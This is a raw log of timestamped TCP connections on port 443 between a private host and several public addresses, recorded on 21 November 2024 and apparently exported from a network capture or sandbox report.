                                                                                                                                                                      Nov 21, 2024 06:24:47.915029049 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.915718079 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:47.915752888 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.916049957 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:47.916058064 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.938436031 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:47.938482046 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.938575029 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:47.939125061 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:47.939133883 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.970710993 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.971245050 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:47.971261978 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:47.971605062 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:47.971609116 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.014489889 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.017662048 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.017842054 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.017842054 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.017842054 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.020678043 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.020744085 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.020848989 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.021008015 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.021030903 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.071960926 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.072489977 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.072508097 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.072941065 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.072947979 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.242424965 CET49981443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.242455006 CET4434998113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.328516960 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.328943014 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.328978062 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.329380989 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.329391956 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.398516893 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.398545980 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.398607016 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.398643017 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.398801088 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.399306059 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.399307013 CET49982443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.399367094 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.399394989 CET4434998213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.409244061 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.409291029 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.409354925 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.409734964 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.409751892 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.414737940 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.417902946 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.417968988 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.418045044 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.418061972 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.418071985 CET49983443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.418076992 CET4434998313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.420367002 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.420407057 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.420475006 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.420593977 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.420602083 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.506741047 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.509932041 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.510000944 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.510077953 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.510096073 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.510104895 CET49984443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.510111094 CET4434998413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.512787104 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.512821913 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.512906075 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.513052940 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.513067961 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.775384903 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.775574923 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.775628090 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.775662899 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.775729895 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.775773048 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.775774002 CET49985443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.775818110 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.775850058 CET4434998513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.778187990 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.778230906 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:48.778315067 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.778445959 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:48.778455019 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.733364105 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.733911037 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:49.733937979 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.734385967 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:49.734394073 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.814389944 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.814517021 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:49.816399097 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:49.816407919 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.816654921 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.818308115 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:49.818367958 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:49.818372965 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:49.818521023 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:49.863338947 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.125618935 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.126152039 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.126188993 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.126585007 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.126590967 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.168401003 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.171511889 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.171681881 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.171681881 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.171681881 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.174216986 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.174261093 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.174458027 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.174513102 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.174520016 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.200563908 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.201082945 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.201101065 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.201638937 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.201642990 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.227158070 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.227396965 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.227566957 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:50.227730036 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:50.227747917 CET4434998640.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.227761030 CET49986443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:24:50.304755926 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.305282116 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.305290937 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.305771112 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.305779934 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.398451090 CET49987443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.398490906 CET4434998713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.564146996 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.564214945 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.564263105 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.564438105 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.564461946 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.564476013 CET49989443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.564483881 CET4434998913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.568346024 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.568384886 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.568440914 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.568835974 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.568849087 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.570638895 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.571732044 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.571748018 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.572174072 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.572177887 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.646133900 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.649281979 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.649358034 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.649360895 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.649405956 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.653799057 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.653822899 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.653835058 CET49990443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.653840065 CET4434999013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.658830881 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.658864021 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.658921003 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.659431934 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.659446001 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.748467922 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.751570940 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.751641035 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.755635023 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.755686998 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.755719900 CET49991443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.755737066 CET4434999113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.760473967 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.760574102 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:50.760646105 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.760984898 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:50.761020899 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.013575077 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.016649008 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.016730070 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.016783953 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.016819000 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.016871929 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.020487070 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.020529032 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.020555973 CET49992443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.020571947 CET4434999213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.057075977 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.057177067 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:51.057363033 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.057596922 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:51.057615995 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.179982901 CET49707443192.168.2.620.190.159.73
                                                                                                                                                                      Nov 21, 2024 06:24:52.342519045 CET4434970720.190.159.73192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.342592001 CET49707443192.168.2.620.190.159.73
                                                                                                                                                                      Nov 21, 2024 06:24:52.619188070 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:24:52.619251013 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.619311094 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:24:52.619668007 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:24:52.619685888 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.630579948 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.631722927 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.631735086 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.632971048 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.632977962 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.678771019 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.682352066 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.682379007 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.682951927 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.682957888 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.707114935 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.710352898 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.710367918 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.711525917 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.711530924 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.730302095 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.734338999 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.734386921 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.734765053 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.734780073 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.842403889 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.846421957 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.846482992 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:52.846875906 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:52.846889019 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.079600096 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.082658052 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.082840919 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.082840919 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.082840919 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.085565090 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.085640907 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.085969925 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.086205959 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.086241007 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.122664928 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.125765085 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.125937939 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.125937939 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.128616095 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.128624916 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.128643990 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.128648996 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.128762960 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.128910065 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.128925085 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.142111063 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.145265102 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.145318985 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.145356894 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.145510912 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.145679951 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.145679951 CET49995443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.145689964 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.145698071 CET4434999513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.148667097 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.148705959 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.148770094 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.159852028 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.159883022 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.174118996 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.177153111 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.177269936 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.177671909 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.177671909 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.177722931 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.177751064 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.181307077 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.181318998 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.181428909 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.182060003 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.182073116 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.286483049 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.289599895 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.289685011 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.289758921 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.289758921 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.289798021 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.289824009 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.292710066 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.292749882 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.292821884 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.292954922 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.292968988 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:53.382555962 CET49993443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:24:53.382567883 CET4434999313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.009594917 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.009917974 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:24:54.009985924 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.011149883 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.011461973 CET49998443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:24:54.011650085 CET44349998216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:24:54.054369926 CET49998443192.168.2.6216.58.206.68
